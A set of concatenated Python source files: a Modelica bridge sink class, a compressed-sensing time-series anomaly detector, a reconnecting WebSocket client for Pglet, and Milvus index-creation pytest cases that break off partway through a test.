def __init__(self,theid,bufferSize):
self._bufferSize_ = bufferSize
self._sinkQueue_ = mp.Queue()
self._started_ = Semaphore()
        # Q15 data is sent, so bufferSize gets a *2 factor since the
        # sink function works with bytes
self._sink_ = Process(target=sink, args=(theid,2*bufferSize,self._sinkQueue_,self._started_))
self._sink_.start()
@property
def queue(self):
return(self._sinkQueue_)
def put(self,data):
if self._sink_.exitcode is None:
q15list=[int(x) for x in data]
self.queue.put(msg.list_to_bytes(q15list),True,1)
else:
raise ModelicaConnectionLost
def end(self):
self._sink_.terminate()
def wait(self):
self._started_.acquire()
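# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original file): minimal usage of the
# Source/Sink pair above.  It assumes the VHT/Modelica bridge server is
# already listening on HOST:PORT; the id 0 and the buffer size of 128
# samples are arbitrary values chosen for the example.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    src = Source(0, 128)   # receives Q15 samples from the server
    dst = Sink(0, 128)     # sends Q15 samples back to the server
    src.wait()             # block until the worker processes have connected
    dst.wait()
    try:
        for _ in range(10):
            samples = src.get()   # list of Q15 integers
            dst.put(samples)      # loop the block straight back
    except ModelicaConnectionLost:
        print("Connection to the server was lost")
    finally:
        src.end()
        dst.end()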
|
cs_anomaly_detector.py
|
import numpy as np
import os
from algorithm.cluster import cluster
from algorithm.cvxpy import reconstruct
from algorithm.sampling import localized_sample
from cvxpy.error import SolverError
from multiprocessing import Process, Event, Queue
from threading import Thread
max_seed = 10 ** 9 + 7
class CycleFeatureProcess(Process):
"""
    Worker process that computes the features of a single cycle
"""
def __init__(
self,
task_queue: Queue,
result_queue: Queue,
cluster_threshold: float
):
"""
        :param task_queue: task queue
        :param result_queue: result queue
        :param cluster_threshold: clustering threshold
"""
super().__init__()
self.task_queue = task_queue
self.result_queue = result_queue
self.cluster_threshold = cluster_threshold
def run(self):
print('CycleFeatureProcess-%d: start' % os.getpid())
while not self.task_queue.empty():
group_index, cycle_data = self.task_queue.get()
self.result_queue.put(
(group_index, cluster(cycle_data, self.cluster_threshold))
)
print(
'CycleFeatureProcess-%d: finish task-%d' %
(os.getpid(), group_index)
)
print('CycleFeatureProcess-%d: exit' % os.getpid())
class WindowReconstructProcess(Process):
"""
    Window reconstruction worker process
"""
def __init__(
self,
data: np.array,
task_queue: Queue,
result_queue: Queue,
cycle: int,
latest_windows: int,
sample_score_method,
sample_rate: float,
scale: float,
rho: float,
sigma: float,
random_state: int,
without_localize_sampling: bool,
retry_limit: int,
            task_return_event: Event
):
"""
        :param data: a copy of the raw data
        :param task_queue: task queue
        :param result_queue: result queue
        :param cycle: cycle length
        :param latest_windows: number of recent history windows referenced
            when computing the sampling-value score
        :param sample_score_method: method used to compute the sampling-value score
        :param sample_rate: sampling rate
        :param scale: sampling parameter: expansion factor for the equally spaced sampling points
        :param rho: sampling parameter: probability of sampling at the center
        :param sigma: sampling parameter: concentration of the sampling
        :param random_state: random seed
        :param without_localize_sampling: whether to sample fully at random instead of
            using the localized sampling algorithm
        :param retry_limit: retry limit for each window
        :param task_return_event: event set when a task is finished, notifying the
            main process to collect the result
"""
super().__init__()
self.data = data
self.task_queue = task_queue
self.result_queue = result_queue
self.cycle = cycle
self.latest_windows = latest_windows
self.sample_score_method = sample_score_method
self.sample_rate = sample_rate
self.without_localize_sampling = without_localize_sampling
self.scale = scale
self.rho = rho
self.sigma = sigma
self.random_state = random_state
self.retry_limit = retry_limit
self.task_return_event = task_return_event
def run(self):
from time import time
if self.random_state:
np.random.seed(self.random_state)
tot = time()
data_process = 0
wait_syn = 0
rec = 0
sample_scoring = 0
print('WindowReconstructProcess-%d: start' % os.getpid())
while not self.task_queue.empty():
t = time()
wb, we, group = self.task_queue.get()
wait_syn += time() - t
t = time()
hb = max(0, wb - self.latest_windows)
latest = self.data[hb:wb]
window_data = self.data[wb:we]
data_process += time() - t
t = time()
sample_score = self.sample_score_method(window_data, latest)
sample_scoring += time() - t
t = time()
rec_window, retries = \
self.window_sample_reconstruct(
data=window_data,
groups=group,
score=sample_score,
random_state=self.random_state * wb * we % max_seed
)
rec += time() - t
t = time()
self.result_queue.put((wb, we, rec_window, retries, sample_score))
self.task_return_event.set()
wait_syn += time() - t
print(
'WindowReconstructProcess-%d: window[%d, %d) done' %
(os.getpid(), wb, we)
)
tot = time() - tot
print('WindowReconstructProcess-%d: exit' % os.getpid())
print(
'tot: %f\ndata_process: %f\nwait_syn: %f\nrec: %f\n'
'sample_scoring:%f\n'
% (tot, data_process, wait_syn, rec, sample_scoring)
)
def sample(self, x: np.array, m: int, score: np.array, random_state: int):
"""
        Get the sampled data.
        :param x: equally spaced KPI time series, shape=(n, d); n is the number of rows, d the dimensionality
        :param m: number of samples
        :param score: sampling confidence of each point
        :param random_state: random seed for sampling
        :return: sampled sequence array X, where X[i][0] is a real number in 0~n-1 giving
                the time point of that sample, and X[i][1] is an array of shape=(d,) with the
                KPI values of every dimension at that time point, 0<=i<m;
                already sorted in ascending order of X[i][0]
"""
n, d = x.shape
data_mat = np.mat(x)
sample_matrix, timestamp = localized_sample(
x=data_mat, m=m,
score=score,
scale=self.scale, rho=self.rho, sigma=self.sigma,
random_state=random_state
)
        # positions corresponding to the sampling centers
s = np.array(sample_matrix * data_mat)
res = []
for i in range(m):
res.append((timestamp[i], s[i]))
res.sort(key=lambda each: each[0])
res = np.array(res)
timestamp = np.array(res[:, 0]).astype(int)
values = np.zeros((m, d))
for i in range(m):
values[i, :] = res[i][1]
return timestamp, values
def window_sample_reconstruct(
self,
data: np.array,
groups: list,
score: np.array,
random_state: int
):
"""
        :param data: raw data
        :param groups: grouping
        :param score: sampling confidence of every point in this window
        :param random_state: random seed
        :return: reconstructed data, number of reconstruction attempts
"""
        # number of points, dimensionality
n, d = data.shape
retry_count = 0
sample_rate = self.sample_rate
while True:
try:
if self.without_localize_sampling:
if random_state:
np.random.seed(random_state)
timestamp = np.random.choice(
np.arange(n),
size=int(np.round(sample_rate * n)),
replace=False
)
values = data[timestamp]
else:
timestamp, values = \
self.sample(
data,
int(np.round(sample_rate * n)),
score,
random_state
)
rec = np.zeros(shape=(n, d))
for i in range(len(groups)):
x_re = reconstruct(
n, len(groups[i]), timestamp,
values[:, groups[i]]
)
for j in range(len(groups[i])):
rec[:, groups[i][j]] = x_re[:, j]
break
except SolverError:
if retry_count > self.retry_limit:
raise Exception(
'retry failed, please try higher sample rate or '
'window size'
)
sample_rate += (1 - sample_rate) / 4
retry_count += 1
from sys import stderr
stderr.write(
'WARNING: reconstruct failed, retry with higher '
'sample rate %f, retry times remain %d\n'
% (
sample_rate, self.retry_limit - retry_count)
)
return rec, retry_count
class CSAnomalyDetector:
"""
    Offline multi-process anomaly detector based on compressed-sensing sampling and reconstruction
"""
def __init__(
self,
cluster_threshold: float,
sample_rate: float,
sample_score_method,
distance,
workers: int = 1,
latest_windows: int = 96,
scale: float = 5,
rho: float = 0.1,
sigma: float = 1 / 24,
random_state=None,
retry_limit=10,
without_grouping: str = None,
without_localize_sampling: bool = False,
):
"""
        :param cluster_threshold: clustering parameter: threshold
        :param sample_rate: sampling rate
        :param sample_score_method: function computing the sampling confidence of each point;
            takes an array(n * d) and returns an array(n) with the sampling confidence of
            the n input points
        :param distance: distance function; takes (array(n * d), array(n * d)) and returns
            a real number giving the distance between the two inputs
        :param workers: number of worker processes
        :param latest_windows: number of history windows referenced when sampling
        :param scale: sampling parameter: expansion factor for the equally spaced sampling points
        :param rho: sampling parameter: probability of sampling at the center
        :param sigma: sampling parameter: concentration of the sampling
        :param random_state: random seed
        :param retry_limit: number of solver retries; if the solve still fails after this
            many retries, an exception is raised
        :param without_grouping: ablation option: disable grouping
        :param without_localize_sampling: ablation option: sample fully at random
"""
if sample_rate > 1 or sample_rate <= 0:
raise Exception('invalid sample rate: %s' % sample_rate)
if without_grouping and without_grouping not in \
{'one_by_one', 'all_by_one'}:
raise Exception('unknown without grouping option')
self._scale = scale
self._rho = rho
self._sigma = sigma
self._sample_rate = sample_rate
self._cluster_threshold = cluster_threshold
self._random_state = random_state
self._latest_windows = latest_windows
        # method for computing the sampling confidence of each point
self._sample_score_method = sample_score_method
        # distance computation method
self._distance = distance
        # retry parameter
self._retry_limit = retry_limit
        # maximum number of worker processes
self._workers = workers
        # ablation options
self._without_grouping = without_grouping
self._without_localize_sampling = without_localize_sampling
def reconstruct(
self, data: np.array,
window: int,
windows_per_cycle: int,
stride: int = 1,
):
"""
        Offline reconstruction of the input data, window by window, using multiple worker processes.
        :param data: input data
        :param window: time-window length (in points)
        :param windows_per_cycle: cycle length, in number of windows
        :param stride: window stride
"""
if windows_per_cycle < 1:
            raise Exception('a cycle contains at least 1 window')
        # cycle length (in points)
cycle = windows_per_cycle * window
        # per-cycle features: grouping for each cycle
groups = self._get_cycle_feature(data, cycle)
print('group per cycle:')
for i in range(len(groups)):
print('cycle: %d ----' % i)
for each in groups[i]:
print(' ', each)
reconstructed, retry_count = self._get_reconstructed_data(
data, window, windows_per_cycle, groups, stride)
return reconstructed, retry_count
def predict(
self,
data: np.array,
reconstructed: np.array,
window: int,
stride: int = 1,
):
"""
        Offline processing: evaluate with the given parameters and obtain the anomaly score of every point.
        :param data: raw data
        :param reconstructed: reconstructed data
        :param window: data window length
        :param stride: window stride
        :return: anomaly score of every point
"""
if reconstructed.shape != data.shape:
raise Exception('shape mismatches')
n, d = data.shape
        # anomaly scores
anomaly_score = np.zeros((n,))
        # number of windows that have already contributed to each position
anomaly_score_weight = np.zeros((n,))
        # index of the left end of the window
wb = 0
while True:
we = min(n, wb + window)
            # index of the right end of the window; window data is [wb, we)
score = self._distance(data[wb:we], reconstructed[wb:we])
for i in range(we - wb):
w = i + wb
weight = anomaly_score_weight[w]
anomaly_score[w] = \
(anomaly_score[w] * weight + score) / (weight + 1)
anomaly_score_weight[wb:we] += 1
if we >= n:
break
wb += stride
return anomaly_score
def _get_reconstructed_data(
self,
data: np.array,
window: int,
windows_per_cycle: int,
groups: list,
stride: int,
):
"""
        Reconstruct the input data window by window, using multiple worker processes.
        :param data: input data
        :param window: time-window length (in points)
        :param windows_per_cycle: cycle length, in number of windows
        :param groups: grouping for each cycle
        :param stride: window stride
:return:
"""
n, d = data.shape
        # reconstructed data
reconstructed = np.zeros((n, d))
        # number of windows that have already been reconstructed at each position
reconstructing_weight = np.zeros((n,))
needed_weight = np.zeros((n,))
        # task queue
task_queue = Queue()
        # result queue
result_queue = Queue()
        # cycle length (in points)
cycle = window * windows_per_cycle
        # index of the left end of the window
win_l = 0
while True:
win_r = min(n, win_l + window)
            # index of the right end of the window; window data is [win_l, win_r)
task_queue.put((win_l, win_r, groups[win_l // cycle]))
needed_weight[win_l:win_r] += 1
if win_r >= n:
break
win_l += stride
task_return_event = Event()
finished = False
def receive_result_thread():
"""
            Thread that receives the results from result_queue
:return:
"""
total_retries = 0
while True:
while result_queue.empty():
task_return_event.clear()
task_return_event.wait()
if finished:
result_queue.put(total_retries)
return
wb, we, rec_window, retries, sample_score = result_queue.get()
total_retries += retries
for index in range(rec_window.shape[0]):
w = index + wb
weight = reconstructing_weight[w]
reconstructed[w, :] = \
(reconstructed[w, :] * weight + rec_window[index]) \
/ (weight + 1)
reconstructing_weight[wb:we] += 1
processes = []
for i in range(self._workers):
process = WindowReconstructProcess(
data=data, task_queue=task_queue, result_queue=result_queue,
cycle=cycle, latest_windows=self._latest_windows,
sample_score_method=self._sample_score_method,
sample_rate=self._sample_rate,
scale=self._scale, rho=self._rho, sigma=self._sigma,
random_state=self._random_state,
without_localize_sampling=self._without_localize_sampling,
retry_limit=self._retry_limit,
task_return_event=task_return_event
)
process.start()
processes.append(process)
receiving_thread = Thread(target=receive_result_thread)
receiving_thread.start()
for each in processes:
each.join()
finished = True
task_return_event.set()
receiving_thread.join()
mismatch_weights = []
for i in range(n):
if reconstructing_weight[i] != needed_weight[i]:
mismatch_weights.append('%d' % i)
if len(mismatch_weights):
from sys import stderr
stderr.write('BUG empty weight: index: %s\n' %
','.join(mismatch_weights))
return reconstructed, result_queue.get()
def _get_cycle_feature(
self,
data: np.array,
cycle: int,
):
"""
        Split the data by cycle and compute the grouping for each cycle.
        :param data: data
        :param cycle: cycle length
        :return: grouping results
"""
        # number of points, dimensionality
n, d = data.shape
        # grouping result for each cycle
cycle_groups = []
        # number of tasks
group_index = 0
        # task queue used to feed data to the child processes
task_queue = Queue()
        # output queue
result_queue = Queue()
        # index where a cycle starts
cb = 0
while cb < n:
            # index where the cycle ends
            ce = min(n, cb + cycle)  # one cycle of data is data[cb, ce)
            # initialize the list that will be appended for this cycle
if group_index == 0:
                # no historical data
                # by default each KPI forms its own group
init_group = []
if not self._without_grouping:
for i in range(d):
init_group.append([i])
cycle_groups.append(init_group)
else:
cycle_groups.append([])
            # fill the task queue with input data
if not self._without_grouping:
task_queue.put((group_index, data[cb:ce]))
group_index += 1
cb += cycle
if self._without_grouping:
if self._without_grouping == 'one_by_one':
                # each KPI in its own group
for each in cycle_groups:
for i in range(d):
each.append([i])
elif self._without_grouping == 'all_by_one':
                # all KPIs in one group
all_in_group = []
for i in range(d):
all_in_group.append(i)
for each in cycle_groups:
each.append(all_in_group)
else:
processes = []
for i in range(min(len(cycle_groups), self._workers)):
process = CycleFeatureProcess(
task_queue, result_queue, self._cluster_threshold
)
process.start()
processes.append(process)
for process in processes:
process.join()
while not result_queue.empty():
group_index, group = result_queue.get()
cycle_groups[group_index] = group
return cycle_groups
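# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original file): minimal offline usage
# of CSAnomalyDetector on random data.  The variance-style sampling score and
# the mean-absolute-error distance below are placeholder functions invented
# for this example; real experiments would plug in their own implementations.
# ---------------------------------------------------------------------------
def _example_sample_score(window_data, latest):
    # Higher score for points that deviate more from the window mean (placeholder).
    deviation = np.abs(window_data - window_data.mean(axis=0)).sum(axis=1)
    total = deviation.sum()
    if total <= 0:
        return np.ones(len(window_data)) / len(window_data)
    return deviation / total
def _example_distance(original, reconstructed):
    # Mean absolute reconstruction error over the window (placeholder).
    return float(np.abs(original - reconstructed).mean())
if __name__ == "__main__":
    demo_data = np.random.rand(960, 4)  # 960 points, 4 KPIs
    detector = CSAnomalyDetector(
        cluster_threshold=0.5,
        sample_rate=0.4,
        sample_score_method=_example_sample_score,
        distance=_example_distance,
        workers=2,
        random_state=42,
    )
    reconstructed, retries = detector.reconstruct(demo_data, window=96, windows_per_cycle=2)
    scores = detector.predict(demo_data, reconstructed, window=96)
    print('retries: %d, max anomaly score: %.4f' % (retries, scores.max()))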
|
reconnecting_websocket.py
|
import logging
import random
import threading
import websocket
from pglet.utils import is_localhost_url
_REMOTE_CONNECT_TIMEOUT_SEC = 5
_LOCAL_CONNECT_TIMEOUT_SEC = 0.2
class ReconnectingWebSocket:
def __init__(self, url) -> None:
self._url = url
self._on_connect_handler = None
self._on_failed_connect_handler = None
self._on_message_handler = None
self.connected = threading.Event()
self.exit = threading.Event()
self.retry = 0
websocket.setdefaulttimeout(
_LOCAL_CONNECT_TIMEOUT_SEC
if is_localhost_url(url)
else _REMOTE_CONNECT_TIMEOUT_SEC
)
    @property
    def on_connect(self):
        return self._on_connect_handler
    @on_connect.setter
    def on_connect(self, handler):
        self._on_connect_handler = handler
    @property
    def on_failed_connect(self):
        return self._on_failed_connect_handler
    @on_failed_connect.setter
    def on_failed_connect(self, handler):
        self._on_failed_connect_handler = handler
    @property
    def on_message(self):
        return self._on_message_handler
    @on_message.setter
    def on_message(self, handler):
        self._on_message_handler = handler
def _on_open(self, wsapp) -> None:
self.connected.set()
self.retry = 0
if self._on_connect_handler != None:
th = threading.Thread(target=self._on_connect_handler, args=(), daemon=True)
th.start()
def _on_message(self, wsapp, data) -> None:
if self._on_message_handler != None:
self._on_message_handler(data)
def connect(self) -> None:
self.wsapp = websocket.WebSocketApp(
self._url, on_message=self._on_message, on_open=self._on_open
)
th = threading.Thread(target=self._connect_loop, args=(), daemon=True)
th.start()
def send(self, message) -> None:
self.connected.wait()
self.wsapp.send(message)
def close(self) -> None:
self.exit.set()
self.wsapp.close()
# TODO: Can't do CTRL+C while it sleeps between re-connects
# Change to Event: https://stackoverflow.com/questions/5114292/break-interrupt-a-time-sleep-in-python
def _connect_loop(self):
while not self.exit.is_set():
logging.info(f"Connecting Pglet Server at {self._url}...")
r = self.wsapp.run_forever()
logging.debug(f"Exited run_forever()")
self.connected.clear()
if r != True:
return
if self.retry == 0 and self._on_failed_connect_handler != None:
th = threading.Thread(
target=self._on_failed_connect_handler, args=(), daemon=True
)
th.start()
backoff_in_seconds = 1
sleep = 0.1
if not is_localhost_url(self._url):
sleep = backoff_in_seconds * 2**self.retry + random.uniform(0, 1)
logging.info(f"Reconnecting Pglet Server in {sleep} seconds")
self.exit.wait(sleep)
self.retry += 1
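# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original file): minimal usage of
# ReconnectingWebSocket.  The URL is an assumption made for the example; a
# Pglet server must be reachable there for the connection to succeed.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    ws = ReconnectingWebSocket("ws://localhost:8550/ws")
    def _handle_connect():
        logging.info("connected, sending a test message")
        ws.send("ping")
    def _handle_message(data):
        logging.info("received: %s", data)
    ws.on_connect = _handle_connect
    ws.on_message = _handle_message
    ws.connect()
    try:
        threading.Event().wait(10)  # keep the demo alive for a few seconds
    finally:
        ws.close()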
|
test_index.py
|
import pytest
from base.client_base import TestcaseBase
from base.index_wrapper import ApiIndexWrapper
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from common.code_mapping import CollectionErrorMessage as clem
from common.code_mapping import IndexErrorMessage as iem
from utils.util_pymilvus import *
from common.constants import *
from pymilvus.exceptions import MilvusException
import copy
prefix = "index"
default_schema = cf.gen_default_collection_schema()
default_field_name = ct.default_float_vec_field_name
default_index_params = {"index_type": "IVF_SQ8", "metric_type": "L2", "params": {"nlist": 64}}
# copied from pymilvus
uid = "test_index"
# BUILD_TIMEOUT = 300
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
default_string_field_name = ct.default_string_field_name
index_name1 = cf.gen_unique_str("float")
index_name2 = cf.gen_unique_str("varchar")
index_name3 = cf.gen_unique_str("binary")
default_string_index_params = {}
default_binary_schema = cf.gen_default_binary_collection_schema()
default_binary_index_params = {"index_type": "BIN_IVF_FLAT", "metric_type": "JACCARD", "params": {"nlist": 64}}
# query = gen_search_vectors_params(field_name, default_entities, default_top_k, 1)
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
default_ip_index_params = {"index_type": "IVF_FLAT", "metric_type": "IP", "params": {"nlist": 64}}
default_nq = ct.default_nq
default_limit = ct.default_limit
default_search_exp = "int64 >= 0"
default_search_field = ct.default_float_vec_field_name
default_search_params = ct.default_search_params
default_search_ip_params = ct.default_search_ip_params
default_search_binary_params = ct.default_search_binary_params
class TestIndexParams(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("collection", [None, "coll"])
def test_index_non_collection(self, collection):
"""
target: test index with None collection
method: input none collection object
expected: raise exception
"""
self._connect()
self.index_wrap.init_index(collection, default_field_name, default_index_params, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0, ct.err_msg: clem.CollectionType})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("field_name", ct.get_invalid_strs)
def test_index_field_name_invalid(self, field_name):
"""
target: test index with error field name
method: input field name
expected: raise exception
"""
collection_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=collection_name)
log.error(iem.WrongFieldName % str(field_name))
self.index_wrap.init_index(collection_w.collection, field_name, default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: iem.WrongFieldName % str(field_name)})
@pytest.mark.tags(CaseLabel.L1)
def test_index_field_name_not_existed(self):
"""
target: test index with error field name
method: input field name not created
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
f_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(collection_w.collection, f_name, default_index_params, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: f"cannot create index on non-existed field: {f_name}"})
@pytest.mark.tags(CaseLabel.L0)
# TODO (reason="pymilvus issue #677", raises=TypeError)
@pytest.mark.parametrize("index_type", ct.get_invalid_strs)
def test_index_type_invalid(self, index_type):
"""
target: test index with error index type
method: input invalid index type
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = copy.deepcopy(default_index_params)
index_params["index_type"] = index_type
if not isinstance(index_params["index_type"], str):
msg = "must be str"
else:
msg = "Invalid index_type"
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: msg})
@pytest.mark.tags(CaseLabel.L1)
def test_index_type_not_supported(self):
"""
target: test index with error index type
method: input unsupported index type
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = copy.deepcopy(default_index_params)
index_params["index_type"] = "IVFFFFFFF"
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
@pytest.mark.tags(CaseLabel.L1)
def test_index_params_invalid(self, get_invalid_index_params):
"""
target: test index with error index params
method: input invalid index params
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = get_invalid_index_params
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
# TODO: not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_name_invalid(self, get_invalid_index_name):
"""
target: test index with error index name
method: input invalid index name
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
index_name = get_invalid_index_name
collection_w = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
class TestIndexOperation(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip("https://github.com/milvus-io/milvus/issues/16741")
def test_index_create_with_different_indexes(self):
"""
target: test create index on one field, with two different type of index
method: create two different indexes
expected: only latest index can be created for a collection
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index)
assert len(collection_w.indexes) == 1
assert collection_w.indexes[0].params["index_type"] == default_index["index_type"]
@pytest.mark.tags(CaseLabel.L1)
def test_index_collection_empty(self):
"""
target: test index with empty collection
method: Index on empty collection
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("index_param", [default_index_params])
def test_index_params(self, index_param):
"""
target: test index with all index type/params
method: input valid params
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
index_params = index_param
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
@pytest.mark.tags(CaseLabel.L1)
def test_index_params_flush(self):
"""
target: test index with all index type/params
method: input valid params
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
# flush
collection_w.num_entities
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
assert collection_w.num_entities == ct.default_nb
# TODO: not support
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_name_dup(self):
"""
target: test index with duplicate index name
method: create index with existed index name create by `collection.create_index`
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
index_name = ct.default_index_name
collection_w = self.init_collection_wrap(name=c_name)
collection_w.collection.create_index(default_field_name, default_index_params, index_name=index_name)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names(self):
"""
target: test index on one field, with two indexes
method: create index with two different indexes
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_fields(self):
"""
target: test index on two fields, with the same name
method: create the same index name with two different fields
expected: exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_fields_B(self):
"""
target: test index on two fields, with the different name
method: create the different index with two different fields
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names_eq_maximum(self):
"""
target: test index on one field with different names, where the number of names equals the maximum supported
method: create the different indexes
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names_more_maximum(self):
"""
target: test index on one field with different names, where the number of names exceeds the maximum supported
method: create the different indexes
expected: exception raised
"""
pass
@pytest.mark.tags(CaseLabel.L1)
def test_index_drop_index(self):
"""
target: test index.drop
method: create index by `index`, and then drop it
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
cf.assert_equal_index(index, collection_w.collection.indexes[0])
self.index_wrap.drop()
assert len(collection_w.collection.indexes) == 0
@pytest.mark.tags(CaseLabel.L1)
# TODO #7372
def test_index_drop_repeatedly(self):
"""
target: test index.drop
method: create index by `index`, and then drop it twice
expected: exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
_, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
self.index_wrap.drop()
self.index_wrap.drop(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Index doesn't exist"})
class TestIndexAdvanced(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L2)
def test_index_drop_multi_collections(self):
"""
target: test index.drop
method: create indexes on two collections by `index`, then drop one of them
expected: the dropped collection has no index left, the other collection keeps its index
"""
c_name = cf.gen_unique_str(prefix)
c_name_2 = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
cw2 = self.init_collection_wrap(name=c_name_2)
iw_2 = ApiIndexWrapper()
self.index_wrap.init_index(cw.collection, default_field_name, default_index_params)
index_2, _ = iw_2.init_index(cw2.collection, default_field_name, default_index_params)
self.index_wrap.drop()
assert cf.assert_equal_index(index_2, cw2.collection.indexes[0])
assert len(cw.collection.indexes) == 0
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_drop_during_inserting(self):
"""
target: test index.drop during inserting
method: create an index by `index`, then drop it while entities are being inserted asynchronously
expected: no exception raised, insert success
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_drop_during_searching(self):
"""
target: test index.drop during searching
method: create an index by `index`, then drop it while an asynchronous search is running
expected: no exception raised, search success
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_recovery_after_restart(self):
"""
target: test that the index still exists after server restart
method: create index by `index`, and then restart server, assert index existed
expected: index in collection.indexes
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_building_after_restart(self):
"""
target: index building resumes if not finished before server restart
method: create index by `index`, restart the server, and assert the server is still indexing
expected: index build finished after server restart
"""
pass
"""
******************************************************************
The following classes are copied from pymilvus test
******************************************************************
"""
class TestNewIndexBase(TestcaseBase):
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request):
log.info(request.param)
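# return a deep copy so tests that mutate the params (e.g. switching metric_type to IP) don't leak changes across parametrized runs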
return copy.deepcopy(request.param)
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_new(self, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: index created successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, shards_num=1)
data = cf.gen_default_list_data(nb=5000)
collection_w.insert(data=data)
log.debug(collection_w.num_entities)
if get_simple_index["index_type"] != "FLAT":
collection_w.create_index(ct.default_float_vec_field_name, get_simple_index,
index_name=ct.default_index_name)
assert len(collection_w.indexes) == 1
@pytest.mark.skip(reason="https://github.com/milvus-io/milvus/issues/12598")
@pytest.mark.tags(CaseLabel.L2)
def test_annoy_index(self):
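"""
target: test building an ANNOY index on a large collection (regression for issue #12598)
method: insert 50000 512-dim vectors generated with numpy, then create an ANNOY index via ApiIndexWrapper
expected: index created with the requested params and no indexnode crash
"""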
# The strange thing is that the indexnode crash is only reproduced when nb is 50000 and dim is 512
nb = 50000
dim = 512
